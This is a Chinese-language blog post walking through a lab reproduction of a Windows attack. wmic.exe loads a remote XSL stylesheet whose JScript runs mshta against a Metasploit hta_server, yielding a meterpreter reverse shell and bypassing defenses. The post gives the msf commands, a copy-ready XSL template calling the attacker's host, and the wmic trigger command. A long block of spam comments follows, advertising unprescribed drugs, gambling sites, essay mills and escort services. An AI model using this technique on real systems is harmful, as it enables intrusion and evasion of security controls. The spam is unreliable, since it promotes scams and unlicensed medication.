亮神说,有wmic可以执行payload,于是就有人复现了一下。
项目地址:https://github.com/Micropoor/Micro8
0x00 WMIC简介(原文复制)
WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本语言,或者不掌握WMI名称空间的基本知识,要用WMI管理系统是很困难的。WMIC改变了这种情况。
0x01 原理概述
利用wmic.exe下载远程XSL(EXtensible Stylesheet Language,可扩展样式表语言)文件。其格式类似XML,其中包含一段JScript代码,可以调用WScript.Shell执行命令。
利用WScript.Shell运行mshta.exe,从远程下载hta文件(HTML Application,HTML应用程序)。该文件可以是一段VBScript,可以使用Wscript.Shell来调用powershell来执行Payload。
0x02 环境
攻击机:Kali Linux
IP:10.0.0.16
靶机:Windows Server 2008 Enterprise R2 x64
IP:10.0.0.4
软件:Metasploit Framework、Web服务器(用于下载xsl文件)。
0x03 实验
打开MSF,启动hta server,设置好payload类型和参数:
msf5> use exploit/windows/misc/hta_server
msf5> exploit
复制以下模板XSL文件,修改其中hta文件的地址为上图中的地址即可。我的虚拟机使用了双网卡,使用靶机可访问的10.0.0.16地址。
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("mshta.exe http://10.0.0.16:8080/0gLLJrV.hta");
]]> </ms:script>
</stylesheet>将XSL文件放在/var/www/html/目录下,启动apache,为靶机提供Payload下载服务。靶机执行以下命令,加载并执行远程Payload:
# wmic.xsl为编辑好的文件
wmic os get format:"http://10.0.0.16/wmic.xsl"
MSF接收到反弹的meterpreter:
wmic.exe为Windows自带管理工具,将PowerShell Payload进行适当的处理后,可以起到神奇的bypass效果。
Black Rubber Caster Wheelブランド時計コピーClassy Hydroxypropyl Methyl Cellulose HPMC
Thank you ever so for you article.Much thanks again. Awesome.
I loved your blog post. Fantastic.
I really liked your blog article.Really thank you! Cool.
what do cbd peanut butter bites for dogs do to your dog
Great article.Much thanks again. Cool.
Great blog.Really thank you! Keep writing.
I really liked your blog post.Much thanks again.
Really informative blog post.Really looking forward to read more. Really Great.
wow, awesome blog post.Really thank you! Awesome.
I will immediately grab your rss feed as I can not in finding your email subscription hyperlink or newsletter service. Do you’ve any? Please let me understand so that I may just subscribe. Thanks.
Very neat post.Really looking forward to read more. Great.
Looking forward to reading more. Great post.Much thanks again. Great.
A round of applause for your article.Much thanks again. Cool.
Muchos Gracias for your post.Thanks Again. Want more.
Really informative blog article.Really looking forward to read more. Really Great.
A big thank you for your blog.Much thanks again. Cool.
I really liked your blog article.Really thank you! Awesome.
Very good post.Really looking forward to read more. Really Great.
Appreciate you sharing, great blog post.Much thanks again. Great.
Fantastic post.
Thank you for your article post.Really looking forward to read more. Really Cool.
Really informative post.Really thank you! Keep writing.
Fantastic article post.Really looking forward to read more. Keep writing.
Fantastic post.Really thank you! Keep writing.
hydroxychloroquine clinical trial chloroquine vs hydroxychloroquine
Great blog. Really Great.
Great blog.Really looking forward to read more. Want more.
I used to be able to find good advice from your blog posts.
Say, you got a nice blog article.Thanks Again. Keep writing.
tiktok follower kaufen mit echten followern
Fantastic article post.Much thanks again. Keep writing.
A big thank you for your blog article.Thanks Again. Want more.
Wow, great article post.Much thanks again. Much obliged.
מילפית עם ציצי ענק וכוס מושלם נדפקת על הספה בכל התנוחות האפשרויותשירותי ליווי במרכז
Thanks for finally talking about > シェアリング・エコノミー – Ayaka’s Blog
Tin Tức, Sự Kiện Liên Quan Lại Đến Trực Tiếp đá Bóng Nữ Giới bet88Đội tuyển nước ta chỉ cần một kết trái hòa có bàn thắng để lần thứ hai góp mặt tại World Cup futsal. Nhưng, nhằm làm được như vậy
You made your point quite clearly!. canadian pharmacies online
I want to see your book when it comes out.
Saved as a favorite, I like your blog!
Great info! Keep post great articles.
ถ้าหากจะถามถึงเกมออนไลน์ที่เล่นง่ายและทำเงินได้ง่ายที่สุดลุกงหนีไม่พ้นบาคาร่าออนไลน์ UFABET ก็เลยเอาใจสมาชิกโดยการรวมรวมเกมบาคาร่าออนไลน์ไว้เยอะมากเพื่อสามาชิกได้เลือกเล่นอย่างเต็มที่นอกเหนือจากนั้นยังมีเกมฯลฯ
It’s time for communities to rally.
I love your blog. It looks every informative.
Nicely put, Many thanks.best essay service essays writing service custom report writing service
You write Formidable articles, keep up good work.
Makes sense to me.
Thank you for helping out, great information. «Riches cover a multitude of woes.» by Menander.
Enjoyed every bit of your blog.Really thank you! Really Great.
Very good blog post.Much thanks again. Keep writing.
Pretty nice post. I just stumbled uoon your blog and wanted to mention that I have truly loved surfingaround yokur blog posts. In anyy case I will be subscribing in yor rssfeed and I’m hoping you write obce more soon!
Looking forward to reading more. Great post.Much thanks again. Keep writing.
Have you given any kind of thought at all with converting your current web-site into French? I know a couple of of translaters here that will would certainly help you do it for no cost if you want to get in touch with me personally.
Do you offer workshops?
I encountered your site after doing a search for new contesting using Google, and decided to stick around and read more of your articles. Thanks for posting, I have your site bookmarked now.
I can’t go into details, but I have to say its a good article!
california department of health services does dust cause asthmaivermectin tablets for sale walmart nphcpe
I’ll right away seize your rss as I can not in findingyour e-mail subscription link or e-newsletter service. Do you have any?Please allow me recognize so that I may subscribe. Thanks.
Does it look like we’re in for a big ride here?
Thank you ever so for you article post.Much thanks again. Really Cool.
Hey! Do you use Twitter? I’d like to follow you if that would be ok. I’m absolutely enjoying your blog and look forward to new posts.
www canadian pharmacies adderall online pharmacy
hydroxychloroquine for covid 19 ncov chloroquine
SPORT-HUNTER แทงบอล แทงบอลออนไลน์ โดยเป็นผู้ให้บริการจาก UFABET กีฬาออนไลน์ คาสิโนออนไลน์ สล็อตออนไลน์ หวยออนไลน์c
What a great article.. i subscribed btw!
Magnificent beat ! Can I be your apprentice? Just kidding!
I’m a massive supporter of your work. I’ll be back to see more sometime soon. Thanks for making it.
hydroxychloroquine manufacturer — hydroxychloroquine plaquenil deltasone without rx script online
fantastic internet site, I could definitely go to your web page once more…acquired some really nice info.
2,009 Gejaagd Door De Wind — Various — Herkennings Melodie (Vinyl, LP) Kempu — )escalГЁ( — Pro Ton EP (File, MP3)
I’ll bookmark your blog and check again here frequently.
essay writernx custom essay writing toronto i26nxu writing a literary essay w20awd
ivermectin for pig lice ivermectin injection for sheep
Thank you for your article.Really looking forward to read more. Keep writing.
wow, awesome article.Thanks Again. Want more.
Awesome blog.Really thank you!
I was able to find good info from your blog posts.|
tomar el acné con sangre: hacer, cuidar y formar
Fantastic blog post.Really looking forward to read more. Will read on…
stromectol cvs
Fantastic blog post. Fantastic.
Appreciate you sharing, great article. Great.
Great blog article.Really looking forward to read more. Want more.
Muchos Gracias for your blog post.Much thanks again. Fantastic.
armodafinil vs modafinil modafinil vs adderall
Appreciate you sharing, great blog post.Thanks Again. Much obliged.
Enjoyed every bit of your blog post.Really looking forward to read more. Want more.
legit canadian pharmacy online express scripts com pharmacies
Thanks for a marvelous posting! I genuinely enjoyed reading it,you’re a great author.I will make certain to bookmark your blog and willcome back at some point. I want to encourage that you continue your great work, havea nice weekend!
I loved your blog.Much thanks again.
Looking forward to reading more. Great blog article.Much thanks again. Awesome.
Say, you got a nice post.Really thank you!
Good information. Lucky me I recently found your blog by chance (stumbleupon). I’ve book marked it for later!
Have you given any kind of thought at all with converting your current web-site into French? I know a couple of of translaters here that will would certainly help you do it for no cost if you want to get in touch with me personally.
free credit ck credit experian credit report free credit score
Saved as a favorite, I like your site!
Thank you ever so for you article.Really looking forward to read more. Awesome.
Awesome article post.Really thank you! Great.
Great article post.Much thanks again. Keep writing.
Fantastic blog article.Much thanks again. Keep writing.
Enjoyed every bit of your article.Much thanks again. Much obliged.
Fantastic blog.Really thank you! Fantastic.
wow, awesome post.Thanks Again. Fantastic.
Very good information. Lucky me I recently found your blog by accident (stumbleupon). I have saved it for later!
El judaísmo acaba explicado: ¿dónde está valak?
I loved your article post.Much thanks again. Really Great.
rx express pharmacy navarre fl cvs pharmacy store location
You actually expressed that superbly. essaywriting4you.com writing argumentative essays
how to get ivermectin in canada ivermectin in canada for humans
Fantastic article post.Really thank you! Much obliged.
Thank you for your post.Really looking forward to read more. Much obliged.
Very informative post. Cool.
Fantastic blog article.Really looking forward to read more. Want more.
ivermectin – purchase stromectol online stromectol for sale
I really liked your blog article.Thanks Again. Awesome.
zithromax online pharmacy canada generic zithromax
Really informative article post.Much thanks again. Fantastic.
dogpatch apartments schaumburg apartments tempe town lake apartments
ต้องการเล่นพนันแต่ว่าไปคาสิโนมิได้ ปัญหาโลกแตกนี้จะหมดไปครับด้วยเหตุว่า UFABET ได้ชูคาสิโนมาไว้ให้แล้ว มีเกมมากมายทั้งยังบาคาร่า สล็อต แทงบอล มองบอลสด มีหมดขอรับ เพียงแต่ลงทะเบียนเป็นสมาชิกกับพวกเราก็เหมือนกับไปคาสิโนจริงๆเลยครับ